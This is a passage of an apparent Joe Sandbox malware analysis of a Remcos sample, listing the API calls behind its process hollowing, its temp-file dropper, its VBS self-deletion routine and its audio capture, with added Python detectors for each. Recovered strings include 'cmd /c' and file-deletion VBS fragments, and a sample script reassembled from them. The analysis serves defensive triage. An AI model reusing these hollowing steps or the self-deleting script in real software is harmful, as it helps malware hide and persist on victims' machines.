                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                    • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                    • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                    • ResumeThread.KERNEL32(?), ref: 00417582
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                    • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                    • GetLastError.KERNEL32 ref: 004175C7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                    • API String ID: 4188446516-3035715614
                                                    • Opcode ID: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                    • Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
                                                    • Opcode Fuzzy Hash: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                    • Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A
                                                    APIs
                                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                    • ExitProcess.KERNEL32 ref: 0041151D
                                                      • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                      • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                      • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                      • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                    • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                      • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                      • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                      • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                    • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                    • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                      • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B5FB
                                                      • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B60F
                                                      • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B61C
                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                    • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                    • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                      • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                    • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                    • API String ID: 4250697656-2665858469
                                                    • Opcode ID: 1619ae0a5cb8ddddf3ff04ab525500410f40dd57126bdc10f07f9034603f2ec7
                                                    • Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
                                                    • Opcode Fuzzy Hash: 1619ae0a5cb8ddddf3ff04ab525500410f40dd57126bdc10f07f9034603f2ec7
                                                    • Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
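The two listings above are the API shapes of two distinct behaviours: the routine at 0041728C..004175C7 resolves ZwCreateSection, ZwMapViewOfSection and ZwUnmapViewOfSection from ntdll by hand, calls CreateProcessW with dwCreationFlags 00000004 (CREATE_SUSPENDED), then walks GetThreadContext, ReadProcessMemory, WriteProcessMemory, SetThreadContext and ResumeThread, which is process hollowing; the routine at 004112D4..004114F1 builds a temp_*.exe path from GetTempPathW and GetTempFileNameW, writes it through the subcall at 0041B59F and opens it with ShellExecuteW. The Python below is an added example, not code from the Joe Sandbox report or from the Remcos sample: it parses lines in the plugin's "Api.MODULE(args), ref: ADDR" format and matches those two call sequences in order, so the same check can be run over other function listings from this report. The sample inputs are copied from the listings above; all function names, the choice of which calls must appear in which order, and the assumption that the plugin's sixth CreateProcessW argument is dwCreationFlags are this example's own (the plugin prints "?" where it could not recover a value, and those positions are treated as unknown).

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One listing line: "<bullet> [Part of subcall function X:] Api.MODULE(args), ref: ADDR"
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
NATIVE_API = re.compile(r"^(?:Nt|Zw)[A-Za-z]+$")  # ntdll exports resolved via GetProcAddress
CREATE_SUSPENDED = 0x00000004                      # dwCreationFlags bit of CreateProcess*

@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str                 # call-site address printed by the plugin
    subcall: Optional[str]   # callee address when marked "Part of subcall function"

def parse_api_listing(text: str) -> List[Call]:
    """Keep the API lines in listing order; headings, hashes and string lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls

def hex_arg(args: List[str], index: int) -> Optional[int]:
    """Numeric value of an argument, or None when the plugin printed '?' or a string."""
    if index < len(args) and re.fullmatch(r"[0-9A-Fa-f]{1,8}", args[index]):
        return int(args[index], 16)
    return None

def detect_process_hollowing(calls: List[Call]) -> Optional[Dict]:
    """CreateProcess*(..., CREATE_SUSPENDED) followed, in order, by context read, remote write,
    context rewrite and resume. Dynamically resolved Nt/Zw APIs are reported alongside."""
    resolved = sorted({a for c in calls if c.api.startswith(("GetModuleHandle", "GetProcAddress"))
                       for a in c.args if NATIVE_API.match(a)})
    start = next((i for i, c in enumerate(calls) if c.api in ("CreateProcessA", "CreateProcessW")
                  and (hex_arg(c.args, 5) or 0) & CREATE_SUSPENDED), None)
    if start is None:
        return None
    wanted = ["GetThreadContext", "WriteProcessMemory", "SetThreadContext", "ResumeThread"]
    chain = []
    for c in calls[start + 1:]:
        if wanted and c.api == wanted[0]:
            chain.append((c.api, c.ref))
            wanted.pop(0)
    if wanted:  # suspended child but no thread redirection: not hollowing on its own
        return None
    return {"technique": "process hollowing", "create_process_ref": calls[start].ref,
            "chain": chain, "resolved_native": resolved,
            "unmaps_image": any(n.endswith("UnmapViewOfSection") for n in resolved)}

def detect_temp_drop_and_run(calls: List[Call]) -> Optional[Dict]:
    """GetTempFileName* -> WriteFile (possibly inside a subcall) -> ShellExecute*/CreateProcess*."""
    start = next((i for i, c in enumerate(calls) if c.api.startswith("GetTempFileName")), None)
    if start is None:
        return None
    tail = calls[start:]
    ext = next((a for c in tail if c.api.startswith("lstrcat") for a in c.args if a.startswith(".")), None)
    writes = [c.ref for c in tail if c.api == "WriteFile"]
    launch = next((c for c in tail if c.api in ("ShellExecuteA", "ShellExecuteW",
                                                "CreateProcessA", "CreateProcessW")), None)
    if not writes or launch is None:
        return None
    prefix = tail[0].args[1] if len(tail[0].args) > 1 else None   # lpPrefixString
    return {"technique": "drop and execute from %TEMP%", "prefix": prefix, "extension": ext,
            "write_refs": writes, "launch_api": launch.api, "launch_ref": launch.ref}

# Constructed input: API lines copied from the two listings above (hollowing routine at
# 0041728C..004175C7, temp-file launcher at 0041140F..00411483), in the plugin's own format.
SAMPLE_HOLLOWING = """
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
• GetProcAddress.KERNEL32(00000000), ref: 0041728F
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
• GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
• SetThreadContext.KERNEL32(?,00000000), ref: 00417575
• ResumeThread.KERNEL32(?), ref: 00417582
"""
SAMPLE_TEMP_DROP = """
• GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
• GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
• lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
  • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B60F
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
"""
```

Running `detect_process_hollowing(parse_api_listing(SAMPLE_HOLLOWING))` returns the CreateProcessW site 0041736C, the four-step chain with its call sites, the three Zw* section APIs the routine resolved, and `unmaps_image` set because ZwUnmapViewOfSection is among them; the temp-file listing yields the "temp_" prefix, the ".exe" extension appended by lstrcatW, the WriteFile site inside the subcall and the ShellExecuteW launch site. The order check matters: a suspended CreateProcess followed by SetThreadContext without a remote write is a debugger or a sandbox-evasion stub, not hollowing, and the function returns None for it.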
                                                    APIs
                                                      • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                      • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                      • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                      • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                      • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                      • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                    • ExitProcess.KERNEL32 ref: 0040C63E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                    • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                    • API String ID: 1861856835-3168347843
                                                    • Opcode ID: fd7b13ec8423b1210edccff714628dc6d4d7ad772231e1350d877a7eaf22c577
                                                    • Instruction ID: 0897204671ac35a997fd8cee39da091aa0ef4b51e820d3179f4d1f6ac17f39c2
                                                    • Opcode Fuzzy Hash: fd7b13ec8423b1210edccff714628dc6d4d7ad772231e1350d877a7eaf22c577
                                                    • Instruction Fuzzy Hash: CD9184316042005AC314FB25D852ABF7799AF91318F10453FF98AA31E2EF7CAD49C69E
                                                    APIs
                                                      • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                      • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                      • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                      • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                      • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                      • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                    • ExitProcess.KERNEL32 ref: 0040C287
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                    • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                    • API String ID: 3797177996-1998216422
                                                    • Opcode ID: b6d8aa243f822d99f1924028b3c9759b42219f1007b10135fb38ab2539ed0bf1
                                                    • Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
                                                    • Opcode Fuzzy Hash: b6d8aa243f822d99f1924028b3c9759b42219f1007b10135fb38ab2539ed0bf1
                                                    • Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E
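Both uninstall routines above (0040C38B..0040C63E and 0040C013..0040C287) delete the Run and Policies\Explorer\Run values under HKEY_CURRENT_USER (80000001), reset the file attributes to FILE_ATTRIBUTE_NORMAL (00000080), and hand the rest to a script: the String ID lines carry "Temp", "\update.vbs", "On Error Resume Next", the FileSystemObject, a `while fso.FileExists("` spin that retries the delete until the executable is no longer locked, `fso.DeleteFile "`, `fso.DeleteFolder "` and finally `fso.DeleteFile(Wscript.ScriptFullName)`, with the first routine also running it through `CreateObject("WScript.Shell").Run "cmd /c ""`. The scanner below is an added example, not code from the report or from Remcos, for triaging .vbs files recovered from a user's Temp directory: it strips comments and line continuations, checks for those indicators co-occurring, and extracts the paths the script waits on and deletes, which tell the analyst where the implant lived. The two sample scripts are constructed from the fragments on this page; the folder path in the first and the whole second script are placeholders, and the function names are this example's own.

```python
import re
from typing import Dict, List

def normalize_vbs(text: str) -> str:
    """Drop ' comments and join '_' line continuations so cosmetic edits do not evade the scan.
    Assumes the strings of interest contain no apostrophes, which holds for this template."""
    out: List[str] = []
    for line in text.splitlines():
        line = re.sub(r"'.*$", "", line).rstrip()
        if out and out[-1].endswith("_"):
            out[-1] = out[-1][:-1] + line.lstrip()
        else:
            out.append(line)
    return "\n".join(out)

INDICATORS = {
    "fso":         re.compile(r'CreateObject\("Scripting\.FileSystemObject"\)', re.I),
    "wait_loop":   re.compile(r'\bwhile\s+\w+\.FileExists\("([^"]+)"\)', re.I),
    "delete":      re.compile(r'\b\w+\.Delete(File|Folder)\b\s*\(?\s*"([^"]+)"', re.I),
    "self_delete": re.compile(r'\.DeleteFile\s*\(\s*WScript\.ScriptFullName\s*\)', re.I),
    "shell_cmd":   re.compile(r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd\s*/c', re.I),
}

def scan_vbs(text: str) -> Dict:
    """Count the indicators and pull out every path the script waits on or removes."""
    src = normalize_vbs(text)
    hits = {name: bool(rx.search(src)) for name, rx in INDICATORS.items()}
    waited = [m.group(1) for m in INDICATORS["wait_loop"].finditer(src)]
    deleted = [m.group(2) for m in INDICATORS["delete"].finditer(src)]
    # A spin-wait on the implant's own path plus self-removal is the helper's signature;
    # a script that merely deletes a file once is not enough on its own.
    helper = hits["fso"] and hits["wait_loop"] and hits["self_delete"]
    return {"hits": hits, "waited_for": waited, "deleted": deleted,
            "score": sum(hits.values()), "verdict": "uninstall helper" if helper else "unknown"}

# Constructed sample: the String ID fragments of the two routines above, assembled into a script
# of the shape they describe. The folder path is a placeholder, not a value taken from the report.
SAMPLE_UPDATE_VBS = r'''On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
while fso.FileExists("C:\Users\user\AppData\Roaming\eaJOpx.exe")
fso.DeleteFile "C:\Users\user\AppData\Roaming\eaJOpx.exe"
wend
fso.DeleteFolder "C:\Users\user\AppData\Roaming\placeholder_dir"
fso.DeleteFile(Wscript.ScriptFullName)
'''

# Constructed benign control: a comment, a continuation line, one delete, no wait, no self-removal.
SAMPLE_BENIGN_VBS = r"""' nightly cleanup
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile _
  "C:\logs\old.log"
"""
```

On the constructed helper the scan reports four of five indicators (the cmd /c wrapper of the first routine is absent from this sample), the executable path as the one being waited on, and the executable and folder as the deletion targets; the control script scores two and stays "unknown" even though it also deletes a file through a continuation line. The self-delete line is matched separately from the quoted-path deletes because it deletes by expression, not by literal path.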
                                                    APIs
                                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
                                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
                                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
                                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
                                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
                                                    • SetEvent.KERNEL32 ref: 0041A39A
                                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
                                                    • CloseHandle.KERNEL32 ref: 0041A3BB
                                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
                                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                    • API String ID: 738084811-1408154895
                                                    • Opcode ID: cc17a3b34cd12a070f40af2c584ee673aee5e994bb4b95cc7fd63c6c7d639fab
                                                    • Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
                                                    • Opcode Fuzzy Hash: cc17a3b34cd12a070f40af2c584ee673aee5e994bb4b95cc7fd63c6c7d639fab
                                                    • Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                    • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                    • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                    • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$Write$Create
                                                    • String ID: RIFF$WAVE$data$fmt
                                                    • API String ID: 1602526932-4212202414
                                                    • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                    • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                    • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                    • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
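The routine at 00401C54..00401D42 writes a WAV file field by field: the thirteen WriteFile calls emit "RIFF", a 4-byte size, "WAVE", "fmt ", a 4-byte chunk length, a 2-byte format tag, a 2-byte channel count, a 4-byte sample rate, a 4-byte byte rate, a 2-byte block align, a 2-byte bits-per-sample value, "data" and a 4-byte data length, which is the canonical 44-byte PCM header. The Python below is an added example, not code from the report or the sample: it builds that header in the same field order and parses recovered files by walking the RIFF chunks, cross-checking the declared sizes against the bytes actually present, so a capture cut short when the writing process was terminated is still reported with its real duration instead of the length the header claims. The sample input is constructed silence; the function names are this example's own.

```python
import struct
from typing import Dict

WAVE_FORMAT_PCM = 1

def build_wav_header(channels: int, sample_rate: int, bits_per_sample: int, data_bytes: int) -> bytes:
    """Canonical 44-byte header in the order the routine above writes it: RIFF, riff size, WAVE,
    "fmt ", 16, format tag, channels, sample rate, byte rate, block align, bits, "data", data size."""
    block_align = channels * bits_per_sample // 8
    byte_rate = sample_rate * block_align
    return (b"RIFF" + struct.pack("<I", 36 + data_bytes) + b"WAVE" + b"fmt "
            + struct.pack("<IHHIIHH", 16, WAVE_FORMAT_PCM, channels, sample_rate,
                          byte_rate, block_align, bits_per_sample)
            + b"data" + struct.pack("<I", data_bytes))

def parse_wav_header(blob: bytes) -> Dict:
    """Walk the chunks rather than assuming offsets, then compare declared and actual sizes."""
    if len(blob) < 12 or blob[:4] != b"RIFF" or blob[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    riff_size, = struct.unpack_from("<I", blob, 4)
    fmt, data_off, data_len, pos = None, None, None, 12
    while pos + 8 <= len(blob):
        cid = blob[pos:pos + 4]
        csize, = struct.unpack_from("<I", blob, pos + 4)
        body = pos + 8
        if cid == b"fmt " and body + 16 <= len(blob):
            tag, ch, rate, brate, align, bits = struct.unpack_from("<HHIIHH", blob, body)
            fmt = {"format_tag": tag, "channels": ch, "sample_rate": rate,
                   "byte_rate": brate, "block_align": align, "bits_per_sample": bits}
        elif cid == b"data":
            data_off, data_len = body, csize
            break                                   # samples follow; nothing else to parse
        pos = body + csize + (csize & 1)            # chunk bodies are word-aligned
    if fmt is None or data_off is None:
        raise ValueError("missing fmt or data chunk")
    actual = len(blob) - data_off
    consistent = data_len == actual and riff_size == len(blob) - 8
    duration = actual / fmt["byte_rate"] if fmt["byte_rate"] else None
    return {**fmt, "data_offset": data_off, "declared_data_bytes": data_len,
            "actual_data_bytes": actual, "sizes_consistent": consistent, "duration_s": duration}

if __name__ == "__main__":
    # Constructed input: one second of 8 kHz mono 16-bit silence, then the same file cut in half.
    header = build_wav_header(1, 8000, 16, 16000)
    print(parse_wav_header(header + b"\x00" * 16000))
    print(parse_wav_header(header + b"\x00" * 8000))
```

For the complete file the parser reports 1.0 s and consistent sizes; for the truncated copy it flags the mismatch and reports 0.5 s from the 8000 bytes actually present. When triaging captures, a header whose declared data length is zero or larger than the file is the usual sign that the writer never got to patch the size fields, and the actual-bytes figure is the one to trust.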
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\AppData\Roaming\eaJOpx.exe,00000001,004068B2,C:\Users\user\AppData\Roaming\eaJOpx.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004064FD
